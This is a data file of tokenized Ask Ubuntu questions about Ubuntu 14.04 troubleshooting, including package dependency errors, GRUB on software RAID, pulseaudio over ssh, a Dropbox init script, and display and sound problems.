509823	ubuntu 14.04 64bit - provides in a package not working	i have recently switched over to 14.04 64bit from 12.04 32bit . i use packages that are built by my company and i have added architecture dependency in the sources.list file like : deb [ arch=i386 ] http : xxxxx a lot of the packages are using the provides : field in the control file in order to full-fill older dependencies . that has worked before on 32bit host machines but now it complains that the package is missing , f.e . i have a package a that provides b and when i install package c that depends on b it fails because it says b is not installed even though package a is properly installed . the control file for package a has architecture defined as all . has this something to do with the architecture mismatch or what ?
509824	invalid entry length ( 0 ) . dmi table is broken ! stop . displayed when enquiring about system-product-name in the terminal .	when i type this command : sudo dmidecode -s system-product-name in my terminal on a dual boot system with mac 0sx 10.9.4 and ubuntu 14.04 . i get the following output : macbookpro11,1 invalid entry length ( 0 ) . dmi table is broken ! stop . why is that ? does it signal that something is wrong with my set up ? can i get rid of it ?
509826	how do i fix the duration of frames when using avconv ?	so far , i 'm doing something like this avconv -i `` image % d.png '' -f image2 - delay 100 -s : v 1280x720 ./filename.mpg but the delay does not seem to change anything .
509827	how to start/configure pulseaudio remotely with ssh ?	i have a remote machine to which i can ssh . on the remote machine there is a program that uses pulse audio to get input from a usb microphone attached to the remote machine . this setup works fine when operated locally , i.e . i can get input from pulse audio when connected locally . over ssh , i receive the error : alsa lib pulse.c:243 : ( pulse_connect ) pulseaudio : unable to connect : connection refused alsa lib pulse.c:243 : ( pulse_connect ) pulseaudio : unable to connect : connection refused equally , when i try to open pavucontrol on the remote machine via ssh -x , i get the message : connection to pulseaudio failed . ... in this case this is likely because pulse_server in the environment/x11 root window properties or default-server in client.conf is misconfingured . pulseaudio -- start n : [ pulseaudio ] main.c : user-configured server at { 30ab51874e4a0ca492830f1400000007 } unix : /home/user2/.pulse/30ab51874e4a0ca492830f1400000007-runtime/native , refusing to start/autospawn . attempting to start pulse audio with x11 : start-pulseaudio-x11 connection failure : connection refused pa_context_connect ( ) failed : connection refused pulseaudio -- check returns straight to the command prompt . if i attempt to get the ssh x properties , i get : user1 @ remote-pc : ~ $ : xprop -root | grep pulse pulse_cookie ( string ) = some stuff here pulse_server ( string ) = `` { 30ab51874e4a0ca492830f1400000007 } unix : /home/user2/.pulse/30ab51874e4a0ca492830f1400000007-runtime/native '' pulse_session_id ( string ) = `` 30ab51874e4a0ca492830f1400000007-1407765989.424751-1424846683 '' pulse_id ( string ) = `` 12165 @ 30ab51874e4a0ca492830f1400000007/2040 '' ok . i have seen questions related to this issue , but in each case , the asker wants to transmit sound across a network connection , which i do > not < want to do . so what do i configure pulse_server to be ? update i seem to have resolved the problem by running pax11publish -r now , xprop -root | grep pulse shows : pulse_server ( string ) = `` { 9899a0f46bdae6bbc8e6e8b200000005 } unix : /home/user1/.pulse/9899a0f46bdae6bbc8e6e8b200000005-runtime/native '' apparently pulseaudio -- check should normally go to the command prompt . apparently this indicates it is running .
509829	14.04 - replaced drive in software raid 1 - how to make bootable ?	i have an ubuntu 14.04 x64 server with 2 500gb drives ( sda and sdb ) in a software raid 1 . i just had to replace sdb . adding it back to the array with mdadm and resyncing was a snap . the problem i 'm running into is making sure it can boot if sda happens to fail in the future . note : all commands below were run as root 1st try most walkthroughs i 've found told me to run : grub-install /dev/sda /dev/sdb which is the exact same command i 've seen the ubuntu installer run a hundred times . however , when i ran that , i got : grub-install : error : more than one install device ? . this has always worked for me . maybe something changed with 14.04 ? 2nd try some walkthroughs recommended setting up grub for the new hard drive manually . the grub prompt scares me , but i was willing to try these steps : # grub -- device-map=/boot/grub/device.map grub > root ( hd0,0 ) grub > setup ( hd0 ) grub > root ( hd1,0 ) grub > setup ( hd1 ) grub > quit only problem ? after the first command , i get : the program 'grub ' is currently not installed . you can install it by typing : apt-get install grub ? ? ? so i tried installing grub . # apt-get install grub reading package lists ... done building dependency tree reading state information ... done suggested packages : grub-legacy-doc the following packages will be removed : grub-gfxpayload-lists grub-pc grub2-common the following new packages will be installed : grub 0 upgraded , 1 newly installed , 3 to remove and 0 not upgraded . need to get 913 kb of archives . after this operation , 438 kb of additional disk space will be used . do you want to continue ? [ y/n ] needless to say , i answered no . 3rd try getting desparate , i tried something i was pretty sure was wrong . the official server guide recommends ( at the bottom of the `` raid maintenance '' section ) : grub-install /dev/md0 this was the output : # grub-install /dev/md0 installing for i386-pc platform . grub-install : warning : could n't find physical volume ` ( null ) ' . some modules may be missing from core image.. grub-install : warning : could n't find physical volume ` ( null ) ' . some modules may be missing from core image.. grub-install : warning : file system `ext2 ' does n't support embedding . grub-install : warning : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged.. grub-install : error : will not proceed with blocklists . scary . it looks like grub has been superceded somehow in 14.04 , but i ca n't find any information about how things have changed . i do have a /boot/grub/ directory , so i know some form of grub is installed . update : i was able to run the following commands independently : grub-install /dev/sda grub-install /dev/sdb however , i 'm unsure if sda will boot after installing grub on sdb and vice versa . am i ok ?
509834	lock screen does not unlock with correct password gnome and ubuntu 14.04	i had to reinstall recently . i installed normal ubuntu 14.04 . i then installed gnome/gnome shell/gdm . i then logged in my user to gnome . since then i have been configuring my system . yesterday , unlock was working fine . today , the automatic lock screen is not accepting my password as valid . it just takes the input like it 's processing it , then takes me right back to the same password prompt . if i click the 'login as a new user ' link , it takes me right back to the lock screen . control-alf-f1 , etc , does nothing . i had to resort to a hard boot . i 've tried this more then once . ( first time was from automatic , idle time lock , second time was from my triggering the lock screen with the keyboard command ) . i 'm certain i have my password right , as i am able to get logged in after the cold boot .
509840	hadoop home depricated	i installed hadoop but i 'm getting the following error . can anyone solve this ? hadoop @ ramesh-h61m-s2p-b3 : ~ $ hadoop -version warning : $ hadoop_home is deprecated . /home/ramesh/work/hadoop-1.1.2/bin/hadoop : line 320 : /usr/lib/jvm/java-1.6.0-openjdk-amd64/bin/java : no such file or directory /home/ramesh/work/hadoop-1.1.2/bin/hadoop : line 390 : /usr/lib/jvm/java-1.6.0-openjdk-amd64/bin/java : no such file or directory hadoop @ ramesh-h61m-s2p-b3 : ~ $
509843	console mode vim 256 color support	this question is about using the console mode ( i.e . ctrl+alt+f1 ) and not about using a terminal emulator . when running from a terminal emulator , my vim uses 256 colors without a problem . i 've tried a few things already based on several searches : ensured set t_co=256 was in my ~/.vimrc ( this was already set up ) installed ncurses-term package exported term as xterm-256color in ~/.bashrc when i go into console mode and do tput colors , it returns 256 and when i echo $ term it outputs xterm-256color . the prompt , ls , etc . in console mode have color but when i launch vim , it 's black and white . i like to use the full screen consoles to keep notes as i 'm working so i can quickly hit the keyboard shortcut to flip back and forth .
509844	after trying to fix sound `` unable to correct problems '' error	i have been trying to get sound working on 14.04 . it looks like now i 've done something even worse , after following : http : //ubuntuforums.org/showthread.php ? t=1316634 i tried to do the following command sudo apt-get install alsa-base i got the following error michael @ michael-all-series : ~ $ sudo apt-get install alsa-base reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . alsa-base : depends : linux-sound-base but it is not going to be installed e : unable to correct problems , you have held broken packages .
509845	problem with mysql in lampp	i have install xampp in ubuntu . when i start it ; it is showing that mysql is started but when i stop it immediately it is saying mysql is not running . / . i am getting error that mysql is disabled when i see in the browser at localhost/xampp can anyone explain why it is happening so .
509846	is it necessary to mount /dev/shm when chroot from ubuntu live cd ?	ubuntu is a debian derivation . debian squeeze ( 6.0.0 ) requires /dev/shm mounting for chroot . i do want to chroot to re-install grub . does ubuntu also require /dev/shm mounting for correct chrooting into a ubuntu installation on a different drive from the live cd ? since which ubuntu version ?
509847	where is keyboard extra settings menu ?	where is this menu in original ubuntu ? i got used to it with kde . i miss it . really . please , no alternatives . i want that menu exactly
509848	mounting a usb external drive question	i have a thermaltake hard drive dock that i use to access data on my many hard drives . i have one internal drive that i keep mounted all the time for music , etc but i like to pop drives in and out with my dock . is there a way to have any drive that is added to the dock mount to the same location every time ? let 's say i have a 3tb drive , 2tb drive and a 1tb drive . when i put the 3tb in the dock , i would like it to mount to /mnt/winexternal . later on in the day , i want to dock my 1tb drive , and i would like it to mount to the same location as the 3tb was previously /mnt/winexternal and so on with the 2tb drive . is this possible ? i am on the most recent version of ubuntu .
509849	when booting trusty it says : `` [ drm : intel_db_start_link_train ] *error* too many full retries , give up ''	on my lenovo thinkpad s531 the newly installed ubuntu 14.04 states '' [ drm : intel_db_start_link_train ] error too many full retries , give up '' while booting . the system , however , seems to work fine . is there anyting to do about this issue . thanks , axel
509852	why does apt-get abort by itself , as though i 'd pressed 'n ' ?	on ubuntu 14.04 , when i try to install an app or even just do : sudo apt-get upgrade i always end up with this message at the end : do you want to continue ? [ y/n ] abort . i did n't type anything , it just automatically aborts . can you guys help me ? ======= [ edit # 1 aug 12 ] ======= here i have copied the entire terminal texts . i have run 2 command here , the : sudo apt-get update and then after i get the result i run the sudo apt-get upgrade here 's the copied texts from terminal : franzbiely @ franz-gizmo : ~ $ sudo apt-get update ign http : //archive.ubuntu.com trusty inrelease ign http : //ppa.launchpad.net trusty inrelease ign http : //archive.canonical.com trusty inrelease ign http : //extras.ubuntu.com trusty inrelease ign http : //archive.ubuntu.com trusty-updates inrelease ign http : //ppa.launchpad.net trusty inrelease hit http : //archive.canonical.com trusty release.gpg hit http : //extras.ubuntu.com trusty release.gpg ign http : //archive.ubuntu.com trusty-backports inrelease ign http : //ppa.launchpad.net trusty inrelease hit http : //archive.canonical.com trusty release hit http : //extras.ubuntu.com trusty release hit http : //archive.canonical.com trusty/partner sources hit http : //extras.ubuntu.com trusty/main sources hit http : //ppa.launchpad.net trusty release.gpg ign http : //dl.google.com stable inrelease hit http : //ppa.launchpad.net trusty release.gpg hit http : //archive.canonical.com trusty/partner amd64 packages hit http : //dl.google.com stable release.gpg hit http : //ppa.launchpad.net trusty release.gpg hit http : //archive.canonical.com trusty/partner i386 packages hit http : //extras.ubuntu.com trusty/main amd64 packages ign http : //archive.ubuntu.com trusty-security inrelease hit http : //dl.google.com stable release hit http : //ppa.launchpad.net trusty release hit http : //extras.ubuntu.com trusty/main i386 packages hit http : //dl.google.com stable/main amd64 packages hit http : //archive.ubuntu.com trusty release.gpg hit http : //ppa.launchpad.net trusty release hit http : //dl.google.com stable/main i386 packages get:1 http : //archive.ubuntu.com trusty-updates release.gpg [ 933 b ] hit http : //ppa.launchpad.net trusty release hit http : //archive.ubuntu.com trusty-backports release.gpg hit http : //ppa.launchpad.net trusty/main amd64 packages get:2 http : //archive.ubuntu.com trusty-security release.gpg [ 933 b ] hit http : //ppa.launchpad.net trusty/main i386 packages hit http : //archive.ubuntu.com trusty release get:3 http : //archive.ubuntu.com trusty-updates release [ 59.7 kb ] hit http : //ppa.launchpad.net trusty/main amd64 packages ign http : //archive.canonical.com trusty/partner translation-en_ph hit http : //ppa.launchpad.net trusty/main i386 packages ign http : //archive.canonical.com trusty/partner translation-en ign http : //extras.ubuntu.com trusty/main translation-en_ph ign http : //extras.ubuntu.com trusty/main translation-en ign http : //dl.google.com stable/main translation-en_ph ign http : //dl.google.com stable/main translation-en hit http : //archive.ubuntu.com trusty-backports release hit http : //ppa.launchpad.net trusty/main amd64 packages get:4 http : //archive.ubuntu.com trusty-security release [ 59.7 kb ] hit http : //ppa.launchpad.net trusty/main i386 packages hit http : //archive.ubuntu.com trusty/main amd64 packages hit http : //archive.ubuntu.com trusty/restricted amd64 packages hit http : //archive.ubuntu.com trusty/universe amd64 packages hit http : //archive.ubuntu.com trusty/multiverse amd64 packages hit http : //archive.ubuntu.com trusty/main i386 packages hit http : //archive.ubuntu.com trusty/restricted i386 packages hit http : //archive.ubuntu.com trusty/universe i386 packages hit http : //archive.ubuntu.com trusty/multiverse i386 packages hit http : //archive.ubuntu.com trusty/main translation-en hit http : //archive.ubuntu.com trusty/multiverse translation-en hit http : //archive.ubuntu.com trusty/restricted translation-en hit http : //archive.ubuntu.com trusty/universe translation-en get:5 http : //archive.ubuntu.com trusty-updates/main amd64 packages [ 290 kb ] ign http : //ppa.launchpad.net trusty/main translation-en_ph ign http : //ppa.launchpad.net trusty/main translation-en ign http : //ppa.launchpad.net trusty/main translation-en_ph ign http : //ppa.launchpad.net trusty/main translation-en ign http : //ppa.launchpad.net trusty/main translation-en_ph ign http : //ppa.launchpad.net trusty/main translation-en get:6 http : //archive.ubuntu.com trusty-updates/restricted amd64 packages [ 5,820 b ] get:7 http : //archive.ubuntu.com trusty-updates/universe amd64 packages [ 177 kb ] get:8 http : //archive.ubuntu.com trusty-updates/multiverse amd64 packages [ 7,381 b ] get:9 http : //archive.ubuntu.com trusty-updates/main i386 packages [ 286 kb ] get:10 http : //archive.ubuntu.com trusty-updates/restricted i386 packages [ 5,820 b ] get:11 http : //archive.ubuntu.com trusty-updates/universe i386 packages [ 178 kb ] get:12 http : //archive.ubuntu.com trusty-updates/multiverse i386 packages [ 7,598 b ] hit http : //archive.ubuntu.com trusty-updates/main translation-en hit http : //archive.ubuntu.com trusty-updates/multiverse translation-en hit http : //archive.ubuntu.com trusty-updates/restricted translation-en get:13 http : //archive.ubuntu.com trusty-updates/universe translation-en [ 87.0 kb ] hit http : //archive.ubuntu.com trusty-backports/main amd64 packages hit http : //archive.ubuntu.com trusty-backports/restricted amd64 packages hit http : //archive.ubuntu.com trusty-backports/universe amd64 packages hit http : //archive.ubuntu.com trusty-backports/multiverse amd64 packages hit http : //archive.ubuntu.com trusty-backports/main i386 packages hit http : //archive.ubuntu.com trusty-backports/restricted i386 packages hit http : //archive.ubuntu.com trusty-backports/universe i386 packages hit http : //archive.ubuntu.com trusty-backports/multiverse i386 packages hit http : //archive.ubuntu.com trusty-backports/main translation-en hit http : //archive.ubuntu.com trusty-backports/multiverse translation-en hit http : //archive.ubuntu.com trusty-backports/restricted translation-en hit http : //archive.ubuntu.com trusty-backports/universe translation-en get:14 http : //archive.ubuntu.com trusty-security/main amd64 packages [ 125 kb ] get:15 http : //archive.ubuntu.com trusty-security/restricted amd64 packages [ 14 b ] get:16 http : //archive.ubuntu.com trusty-security/universe amd64 packages [ 43.4 kb ] get:17 http : //archive.ubuntu.com trusty-security/multiverse amd64 packages [ 1,147 b ] get:18 http : //archive.ubuntu.com trusty-security/main i386 packages [ 122 kb ] get:19 http : //archive.ubuntu.com trusty-security/restricted i386 packages [ 14 b ] get:20 http : //archive.ubuntu.com trusty-security/universe i386 packages [ 43.3 kb ] get:21 http : //archive.ubuntu.com trusty-security/multiverse i386 packages [ 1,402 b ] hit http : //archive.ubuntu.com trusty-security/main translation-en hit http : //archive.ubuntu.com trusty-security/multiverse translation-en hit http : //archive.ubuntu.com trusty-security/restricted translation-en hit http : //archive.ubuntu.com trusty-security/universe translation-en ign http : //archive.ubuntu.com trusty/main translation-en_ph ign http : //archive.ubuntu.com trusty/multiverse translation-en_ph ign http : //archive.ubuntu.com trusty/restricted translation-en_ph ign http : //archive.ubuntu.com trusty/universe translation-en_ph fetched 1,502 kb in 3min 15s ( 7,672 b/s ) reading package lists ... done franzbiely @ franz-gizmo : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages have been kept back : gnome-settings-daemon-schemas linux-headers-generic linux-signed-generic linux-signed-image-generic unity-settings-daemon the following packages will be upgraded : linux-libc-dev 1 upgraded , 0 newly installed , 0 to remove and 5 not upgraded . need to get 784 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] abort . franzbiely @ franz-gizmo : ~ $ ======= [ / end edit ] =============
509853	black screen after resuming from suspend on dual boot 14.04/osx 10.9.4	i am yet to successfully resume from suspend since installing ubuntu - this is the case when selecting suspend from the menu or when closing the lid . the backlit keyboard does start but the screen is black . what do i do ? do i need to install/uninstall drivers ? i am using a macbook pro retina with a dual boot using refind with osx 10.9.4 and ubuntu 14.04 installed . additional system info : model name : macbook pro model identifier : macbookpro11,1 processor name : intel core i5 processor speed : 2.4 ghz graphics : intel iris memory : 8 gb 1600 mhz ddr3
509854	problem with graphic device on binary-driver notebook	on my notebook i have two graphical device . amd hd6470m and amd m880g with ati mobility radeon hd 4250 . ubuntu automatically select the second graphical card , but it is n't so powerfull as i want . ubuntu @ ubuntu : ~ $ lspci -vnn | grep vga 01:05.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] rs880m [ mobility radeon hd 4225/4250 ] [ 1002:9712 ] ( prog-if 00 [ vga controller ] ) 02:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] seymour [ radeon hd 6400m/7400m series ] [ 1002:6760 ] ( rev ff ) ( prog-if ff ) i tryed to select hd6470m in ubuntu 13.04 , 13.10 , 14.04 , but result was the same : system is running in low-graphic mode . recently i found out , that driver fglrx used in these version do n't support radeon hd 6400m/7400m series . my process : sudo apt-get install linux-headers-generic sudo apt-get install fglrx fglrx-amdcccle but : root @ vojta-pc : /home/vojta # sudo amdconfig -- initial -f amdconfig : no supported adapters detected root @ vojta-pc : /home/vojta # sudo amdconfig -- px-dgpu amdconfig : no supported adapters detected i got advice to try unutnu 12.04.1 . driver fglrx used in this version allegedly support radeon hd 6400m/7400m series . my process : sudo apt-get install linux-headers-generic sudo apt-get install fglrx fglrx-amdcccle sudo amdconfig -- initial -f sudo amdconfig -- px-dgpu but result was that screen of ubuntu stayed purpure . it was all . i have heart login sound even , but nothing to seen . x.org log here . do you know , how to solve it . thanks .
509856	14.04 blank screen after last update nvidia	since i installed last update this morning , ubuntu starts with a blank screen and no cursor . i can get the prompt and login with ctrl-alt-f6 . i do n't know what is not starting and i have no clue what i 'm supposed to do once i 'm logged in the terminal . is it possible to start the gui manually ? or , can i downgrade the last update ? i have only ubuntu installed and the graphic card is a nvidia . i do n't know much more . could anyone please help me ? i ca n't use my computer anymore . thank you !
509857	transfer `` backintime '' saves from old pc to new one	i 'm changing my pc for a newer one . for two years , i have been keeping weekly `` saves '' using backintime . these saves are very helpful : they help to quickly go over the whole history of a project . now , i 'm wondering , is there a way to use these backintime saves from another pc than the one used to create them and , if yes , how ( if it helps , currently these saves reside on an external hdd ) ?
509858	dropbox not running after logging off : init.d vs. dropbox.py	i 'm inheriting admin control over a server used to process and share data between investigators . we 've been trying to use dropbox to share some of the files . dropbox was installed when i took over the server , so it seemed like an easy method . however , i ca n't get dropbox to stay running consistently . i initially linked my account to dropbox using the gui in an x session . i added the dropbox cli interface ( dropbox.py ) and an init.d entry to start it as a daemon , using one of the many examples i found online ( currently init.d script is modeled after this one , see below for the actual script ) . when i reboot the server calling service dropbox status returns that it is running , but dropbox.py states it is not , and nothing syncs . if i manually start using dropbox.py , everything syncs - but the dropbox service reports it as not running . if i manually start via service dropbox start , the service reports itself as not running but dropbox.py reports it as syncing . whenever i log in and fix it , everything seems to run fine for a day or two , but then it stops syncing again . i 've tried killing the init.d script , removing all entries and reinstalling . i 've tried reinstalling dropbox via command line . i can not seem to figure out what the issue is , and the examples i 'm finding elsewhere all assume the server is running headless only ( which it is n't - several users are primarily accessing it via remote desktop ) . i do n't care if dropbox starts on gui login or not , i just want it running in the background at all times , whether i am logged in or not . and i definitely do n't want it to stop if i log in ( either cli or x session ) , which i have read can happen depending on how it 's started initially . ( dropbox 2.10.3 , x64 , on ubuntu 12.04.5 lts ) any suggestions ? init.d/dropbox script in use ( example here uses dummy user name ) : # ! /bin/sh # # # begin init info # provides : dropbox # required-start : $ local_fs $ remote_fs $ network $ syslog $ named # required-stop : $ local_fs $ remote_fs $ network $ syslog $ named # default-start : 2 3 4 5 # default-stop : 0 1 6 # x-interactive : false # short-description : dropbox service # # # end init info # replace with linux users you want to run dropbox clients for dropbox_users= '' my_user_name '' start ( ) { echo `` starting dropbox ... '' for dbuser in $ dropbox_users ; do homedir= $ ( getent passwd $ dbuser | cut -d : -f6 ) daemon= $ ( find $ homedir/.dropbox-dist/dropbox-lnx . * -name dropboxd ) if [ -x $ daemon ] ; then home= '' $ homedir '' start-stop-daemon -b -o -c $ dbuser -s -u $ dbuser -x $ daemon -p `` $ homedir/.dropbox/dropbox.pid '' fi done } stop ( ) { echo `` stopping dropbox ... '' for dbuser in $ dropbox_users ; do homedir= $ ( getent passwd $ dbuser | cut -d : -f6 ) daemon= $ ( find $ homedir/.dropbox-dist/dropbox-lnx . * -name dropbox ) if [ -x $ daemon ] ; then start-stop-daemon -o -c $ dbuser -k -u $ dbuser -x $ daemon fi done } status ( ) { for dbuser in $ dropbox_users ; do dbpid=`ps -u $ dbuser -o pid , cmd | grep `` $ homedir '' / '' $ daemon '' \ $ | awk ' { print \ $ 1 } '` if [ -z $ dbpid ] ; then echo `` dropboxd for user $ dbuser : not running . '' else echo `` dropboxd for user $ dbuser : running ( pid $ dbpid ) '' fi done } case `` $ 1 '' in start ) start ; ; stop ) stop ; ; restart|reload|force-reload ) stop start ; ; status ) status ; ; * ) echo `` usage : /etc/init.d/dropbox { start|stop|reload|force-reload|restart|status } '' exit 1 esac exit 0
509861	finger print sensor for project	i am an engineering student and i am doing my minor project which uses finger print sensor and i am using r30x series . can i work in the ubuntu platform and work with the module that i have got . please give me the appropriate answer . i want to use qt or python to make a database to store the result of finger print sensor . can we interface the finger print module in ubuntu . if yes then what are the code .
509864	after suspend the keyboard ceases to respond to rapid clicking ? 14.04	using ubuntu gnome 14.04 on pc : motherboard asus p8h77-v keyboard genius kb-120 after suspend the keyboard ceases to respond to rapid clicking ? each press must continue 0,2 - 0,5 seconds before the system responds . tried : sudo apt-get install -- reinstall xserver-xorg-input-all did not help .
509866	problem installing eclipse	when i download eclipse and extract it and write at terminal ./eclipse see this error bash : ./eclipse : can not execute binary file what can i do ?
509868	typing is extremely sluggish/choppy after upgrading to 14.04	last night i upgraded to 14.04 . since then , typing text has been almost unbearably unresponsive . double letters often pop up , while letters are skipped at other times . the worst happens in terminal , where terminal starts darkening and becoming unresponsive . it takes 2-3 times the amount of time to do anything because of the lag , regardless of the application . i 've tried reinstalling the input driver using `` sudo apt-get -- reinstall install xserver-xorg-input-synaptics '' . no luck .
509869	delete line gtk keybinding	how do i bind a key combination ( alt-backspace ) to delete the current line of text ? for example , bind `` < alt > left '' { `` move-cursor '' ( display-line-ends , -1 , 0 ) } ; in gtk-keys.css moves the cursor to the beginning of the line ( this works for me ) . ( using gtk 2/3 would be preferable , but other methods would be ok ) i want to delete the current line of text left of the cursor , not the paragraph to the left of the cursor . bind `` < alt > backspace '' { `` delete-from-cursor '' ( display-lines , -1 ) } ; does n't work . pressing alt-backspace does nothing , nor does display-line-ends . bind `` < alt > backspace '' { `` delete-from-cursor '' ( paragraph-ends , -1 ) } ; deletes the paragraph to the left of the cursor . i was thinking that i could select the text i want to delete ( `` move-cursor '' ( display-line-ends , -1 , 1 ) ) and delete it , but i ca n't figure out how to do the latter . if anyone can direct me to resources listing gtk keybindings , i would be much obliged . thanks in advance
509870	gparted shows % 100 used disk	i have installed clean ubuntu on my ssd disk and i tried create a partition with gparted but it shows my disk usage % 100 . is it bug ?
509871	managed vs. unmanaged switch for beowulf cluster	i am setting up a very small beowulf cluster with one master node ( my lenovo laptop ) and two server nodes ( dell optiplex 760s ) , all currently with ubuntu 14.04 . can i get away with using an unmanaged consumer-grade switch ? or do i need a managed one ? note : there will also be one other user on the network ( on his own laptop ) that will not be taking part in the cluster but will still need to use the internet connection .
509876	need driver for an epson wf-3620 printer	does anyone know where i can get an ubuntu driver for the epson wf-3620 printer ? the `` linux drivers '' page they send me to has download buttons but they do n't work . thanks !
509877	travelmate b113-e touchpad not working	i installed ubuntu trusty 32bit and the touchpad is not working . neither lspci , nor lshw nor lsusb is showing the touchpad . also xinput -- list is not showing it . any hint ?
509881	tail : reading an entire file , and then following	i would like a tail -f type of behavior that reads the entire file and then continues to follow it as it 's written to . solution based on the answer i accepted , this works : tail -f -n +1 { filename } why it works : the -f option continues to `` follow '' the file and output new lines as they are written to the file . the -n +1 instructs tail to start reading the file from the first line . using -n -10 would start with the last ten lines of the file .
509883	sound distorted/choppy in wine . i 've looked everywhere for a fix	i installed the windows version of steam on top of wine . i then proceeded to download the windows version of the witcher . surprisingly , the graphics run beautifully with no tweaks . the issue is with the sound . it 's choppy , laggy , scratchy , and badly distorted . i 've tried several different approaches to fixing this . i set the `` default-fragment-size-msec '' value to 5 in /etc/pulse/daemon.conf . i uninstalled pulse audio completely and installed alsa . in the wine config , simply testing sound produces the problem , so it 's not an issue with steam or the game . if anyone answers , please explain it to me like i 'm an idiot . i 'm new to linux and not very confident yet . i 've found a lot of questions about this , both here on askubuntu and on other sites , but not a lot of answers . the computer i installed ubuntu on was meant to be a gaming computer and i 'll be pretty disappointed if i ca n't play any games on it . thanks .
509885	how to re-use last vi command	how does one re-use a just-executed command in vim ? for example , i open a file with : vi mytestfile then in normal mode , i search for a word using : /mysearchword\c < enter > now i want to search for another similar but slightly different word . but this requires me to type the whole thing again : /mysearchword_1\c < enter > it would have been much easier if i could just edit the current command that was just executed , and append `` _1 '' to it rather than typing the whole thing again . is this possible ?
509886	reject mail with attachment and show a message instead	i 'm new in term of linux environment and i really want to know if my problem have a solution or not . so , i have the horde groupware installed , and the users could send email normally , but i want to know if i could prevent them of using the option to add attachment ? i change some files of the groupware in order to show the message ( please use filezilla to send attachment ! ) but if i configure the user on thunderbird , he could send the attachment . so , in fact i change this from the client side , how can i do the same from the server side , so whatever the users use mail client , they will have the same behavior ( alert them to use the filezilla )
509887	outlook 2010 via wine is installed , but ca n't add an account / ubuntu 14.04	i have installed ms office 2010 using wine on ubuntu 14.04 . when i open outlook and try to add new account , i see following : http : //www.imagebam.com/image/e0d8c2344431849 i press `` add account '' and `` account settings - > account settings '' , but nothing happens . could someone help me with this case ? thanks !
509889	internet connection	does anyone else lose internet connection when suspended . when i try to get on the next day after suspending the night before i have to reboot my modem or unplug and replug the ethernet in the back of my modem . wondered if this is a common problem with ubuntu or i may have a bad modem it is old ( 2006 ) and i have at & t dsl internet . again thanks for the help .
509891	i can not install or remove apps after trying to install bumblebee and nvidia prime	here are the details which terminal output when trying to remove or upgrade i tried autoremove - install configure dpkg and nothings work for me removing nvidia-331 ( 331.89-0ubuntu1~xedgers14.04.2 ) ... stop : unknown instance : userdel : existing lock file /etc/subgid.lock without a pid userdel : can not lock /etc/subgid ; try again later . dpkg : error processing package nvidia-331 ( -- remove ) : subprocess installed post-removal script returned error exit status 18 errors were encountered while processing : nvidia-331 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
509894	ca n't switch to nvidia gpu after select intel gpu ?	i use nvidia-prime to switch between 2 gpu in my laptop ( nvidia and intel ) . after switch to intel gpu , i ca n't back with nvidia gpu . i try reboot laptop and select windows 8 os ( i have 2 os in my laptop ) and i found out my windows also does not recognize nvidia card . ( missing entirely , same as my computer only intel card ) .
509899	how can i determine the minimal installation set for a list of packages ?	i have some installation notes for installing the glew libraries for development purposes . they read : install everything with `` glew '' in its name . this means i currently run : sudo apt install glew-utils libglewmx-dev libglew-dbg libglewmx-dbg libglew-dev libglewmx1.10 libglew1.10 ... except that i 'm sure some of these are prerequisites , and i do n't need to include them in the list . given that i have a list of package names as above , how can i reduce it to install only the non-dependencies , without having inspect each package 's dependencies individually in synaptic package manager , aptitude or a similar tool ? i guess i 'm looking for either a `` select a group of packages '' option in a gui program or magic-debian-tool < list-of-packages >
509900	generic-cups-pdf-printer - ubuntu 14.04	printing any document to a pdf works nicely . unfortunately i want the created pdf file to be saved at a different location . the current default location is : /home/pdf the desired one location is : /home/myname/dropbox/printwork i tried to edit the file containing the default directory for this kind of work : /etc/cups/cups-pdf.conf problem is that ( i am the superuser ) i do n't get a permission to save the new default location . when i look at 'permissions ' everything is dimmed . i am a starting ubuntu 14.04 user since 3 weeks . i already spent a lot of hours to solve this , can anybody help me getting this right ?
509902	how to install matlab on ubuntu 14.04 ?	how to install matlab in ubuntu 14.04 ? i searched in usc , but it only has some extension for matlab .
509906	possible to make `` forget password immediately '' the default when opening luks encrypted partition ?	when a luks encrypted partition pops up the unlock window it gives 3 options for how to remember the password . the `` remember password until you logout '' is always ticked by default . is there a way to make `` forget password immediately '' the default ? enter a passphrase to unlock the volume : [ ] forget password immediately [ x ] remember password until you logout [ ] remember forever
509909	can not access to directory	i tried to access downloads direcory throught the command cd downloads but its give me the following message : can not create temp file for here-document : read-only file system bash : cd : down : no such file or directory . so what is the problem and how to slove it ? im use 14.04 version `
509912	why does n't apticron ever send me emails ?	i installed apticron and configured it with a certain email address , but it never seems to send any emails .
509914	making my first bash script , ca n't get the cd command to 'stick . '	for my first bash script , i want to create something that 's really been annoying me : when i switch folders , i want the contents of that folder to be displated automatically . i tried adding this following code to ~/.bashrc : alias go='cd ; ls' simple enough i thought ! not so . while typing go /etc does indeed list the contents of /etc , my working directory has n't actually changed , i 'm still in the one i was in before . how do i remedy this ?
509916	lock screen on login	i 've some software i connect to remotely and occasionally the computer reboots because of power outage , etc so i have set in my bios that after power failure that the computer should reboot . i can enable my username for auto login however what i then need to do is automatically lock the screen on login . how would i do that . i 'm using ubuntu 14.04
